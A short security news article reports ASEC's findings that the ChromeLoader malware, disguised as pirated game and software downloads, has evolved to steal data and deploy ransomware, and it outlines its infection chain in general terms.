Beware pirated video game downloads as they could be malware in disguise. According to a report by AhnLab Security Emergency Response Center (ASEC), a browser hijacking credential stealer called ChromeLoader has evolved and is now capable of stealing data, deploying ransomware, and more.

ChromeLoader first appeared in January of 2022, arose in deployments in May of last year, then in September VMware reported seeing new variants popping up. It’s being distributed via a variety of malvertising sites which host the malicious files, and they appear to a user as pirated and free game downloads. When the malware is downloaded, it appears as an install.lnk file and this executes a batch script which decompresses a .zip archive, then executes a data.ini file plus a couple of scripts that retrieve a payload.

The malware is set up as a Chrome extension, which will then redirect a user to advert sites to generate income for the malicious operators while also stealing data and potentially downloading ransomware. Originally, it was distributed as an ISO file, but this has recently changed to a VHD (Virtual Hard Disk) file which is easier to mount on a Windows system and is also supported in VMs.

The game titles it is currently using include Elden Ring, Roblox, Red Dead Redemption 2, Need for Speed, Call of Duty, Portal 2, Minecraft, Pokémon, Mario Kart, Dark Souls 3, Animal Crossing and The Legend of Zelda, plus many paid software titles including Photoshop and Microsoft Office. ASEC includes indicators of compromise in their post, and users can avoid this malware by not downloading pirated software.